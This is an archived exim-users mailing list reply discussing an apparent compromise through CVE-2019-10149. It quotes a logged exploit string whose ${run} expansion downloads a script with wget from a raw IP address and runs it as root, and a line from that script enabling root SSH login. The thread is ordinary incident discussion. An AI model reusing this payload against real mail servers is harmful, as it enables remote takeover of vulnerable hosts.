Re: [exim] just been hacked, could be CVE-2019-10149?

Top Page
This message is part of the following thread:
Mthe complete thread tree sorted by date
MOdhiambo Washington at <-
MKonstantin Boyandin at ->
Delete this message
Reply to this message
Author: Klaus Ethgen
Date:  
To: exim-users
Subject: Re: [exim] just been hacked, could be CVE-2019-10149?
> > root+${run{/bin/bash -c "wget --no-check-certificate -T 36
> > https://185.162.235.211/ldm1ip -O /root/.fabyfmnp && sh /root/.fabyfmnp
> > -n" &}}@xxx: Too many "Received" headers - suspected mail loop
> >
> >
> Interesting script - targetting Linux systems using systemd.

Not only that, it is dilettantic...

"${sudo} echo PermitRootLogin yes >> /etc/ssh/sshd_config"

I can write the sudo bevore any command but it gives no more sense. 

Regards
   Klaus
-- 
Klaus Ethgen                                       http://www.ethgen.ch/
pub  4096R/4E20AF1C 2011-05-16            Klaus Ethgen <Klaus@???>
Fingerprint: 85D4 CA42 952C 949B 1753  62B3 79D0 B06F 4E20 AF1C

This message was posted to the following mailing lists:
Exim-users
Mailing List Info | Nearby Messages		<-Re: [exim] just been hacked, could be CVE-2019-10149?Re: [exim] DKIM signing table->
Tahini and Hummus and Cumin Development Archives administrated by cumin AdminsLurker (version 2.3)